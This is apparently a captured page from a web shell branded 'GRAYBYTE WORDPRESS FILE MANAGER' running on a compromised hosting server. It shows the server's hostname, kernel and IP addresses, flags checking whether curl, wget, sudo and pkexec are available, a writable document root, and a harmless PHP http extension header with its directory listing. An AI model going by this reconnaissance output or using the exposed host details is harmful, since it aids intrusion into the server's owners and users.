✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server366.web-hosting.com ​🇻​♯➤ 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 67.223.118.204 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.62
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/alt/php85/usr/include/php/ext/http//php_http_header_parser.h
/*
    +--------------------------------------------------------------------+
    | PECL :: http                                                       |
    +--------------------------------------------------------------------+
    | Redistribution and use in source and binary forms, with or without |
    | modification, are permitted provided that the conditions mentioned |
    | in the accompanying LICENSE file are met.                          |
    +--------------------------------------------------------------------+
    | Copyright (c) 2004-2014, Michael Wallner <mike@php.net>            |
    +--------------------------------------------------------------------+
*/

#ifndef PHP_HTTP_HEADER_PARSER_H
#define PHP_HTTP_HEADER_PARSER_H

#include "php_http_info.h"

typedef enum php_http_header_parser_state {
	PHP_HTTP_HEADER_PARSER_STATE_FAILURE = FAILURE,
	PHP_HTTP_HEADER_PARSER_STATE_START = 0,
	PHP_HTTP_HEADER_PARSER_STATE_KEY,
	PHP_HTTP_HEADER_PARSER_STATE_VALUE,
	PHP_HTTP_HEADER_PARSER_STATE_VALUE_EX,
	PHP_HTTP_HEADER_PARSER_STATE_HEADER_DONE,
	PHP_HTTP_HEADER_PARSER_STATE_DONE
} php_http_header_parser_state_t;

#define PHP_HTTP_HEADER_PARSER_CLEANUP 0x1

typedef struct php_http_header_parser {
	zend_ptr_stack stack;
	php_http_info_t info;
	struct {
		char *str;
		size_t len;
	} _key;
	struct {
		char *str;
		size_t len;
	} _val;
} php_http_header_parser_t;

PHP_HTTP_API php_http_header_parser_t *php_http_header_parser_init(php_http_header_parser_t *parser);
PHP_HTTP_API php_http_header_parser_state_t php_http_header_parser_state_is(php_http_header_parser_t *parser);
PHP_HTTP_API void php_http_header_parser_dtor(php_http_header_parser_t *parser);
PHP_HTTP_API void php_http_header_parser_free(php_http_header_parser_t **parser);
PHP_HTTP_API php_http_header_parser_state_t php_http_header_parser_parse(php_http_header_parser_t *parser, php_http_buffer_t *buffer, unsigned flags, HashTable *headers, php_http_info_callback_t callback_func, void *callback_arg);
PHP_HTTP_API php_http_header_parser_state_t php_http_headerparser_parse_stream(php_http_header_parser_t *parser, php_http_buffer_t *buffer, php_stream *s, unsigned flags, HashTable *headers, php_http_info_callback_t callback_func, void *callback_arg);

typedef struct php_http_header_parser_object {
	php_http_buffer_t *buffer;
	php_http_header_parser_t *parser;
	zend_object zo;
} php_http_header_parser_object_t;

PHP_HTTP_API zend_class_entry *php_http_get_header_parser_class_entry(void);

PHP_MINIT_FUNCTION(http_header_parser);

zend_object *php_http_header_parser_object_new(zend_class_entry *ce);
php_http_header_parser_object_t *php_http_header_parser_object_new_ex(zend_class_entry *ce, php_http_header_parser_t *parser);
void php_http_header_parser_object_free(zend_object *object);

#endif /* PHP_HTTP_HEADER_PARSER_H */

/*
 * Local variables:
 * tab-width: 4
 * c-basic-offset: 4
 * End:
 * vim600: noet sw=4 ts=4 fdm=marker
 * vim<600: noet sw=4 ts=4
 */



Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
10 May 2026 8.36 PM
root / linksafe
0755
php_http.h
1.028 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_api.h
4.031 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_buffer.h
10.267 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_client.h
7.178 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_client_curl.h
2.509 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_client_curl_event.h
1.013 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_client_curl_user.h
2.726 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_client_request.h
1.022 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_client_response.h
1.028 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_cookie.h
3.764 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_curl.h
1.202 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_encoding.h
4.627 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_encoding_brotli.h
2.061 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_encoding_zlib.h
2.298 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_env.h
3.762 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_env_request.h
0.979 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_env_response.h
3.219 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_etag.h
1.553 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_exception.h
2.262 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_filter.h
0.955 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_header.h
1.763 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_header_parser.h
2.896 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_info.h
2.051 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_message.h
4.71 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_message_body.h
4.089 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_message_parser.h
3.236 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_misc.h
7.879 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_negotiate.h
3.92 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_object.h
1.812 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_options.h
2.191 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_params.h
2.392 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_querystring.h
1.833 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_response_codes.h
3.532 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_url.h
4.555 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_utf8.h
20.546 KB
23 Dec 2025 9.15 PM
root / root
0644
php_http_version.h
1.432 KB
23 Dec 2025 9.15 PM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF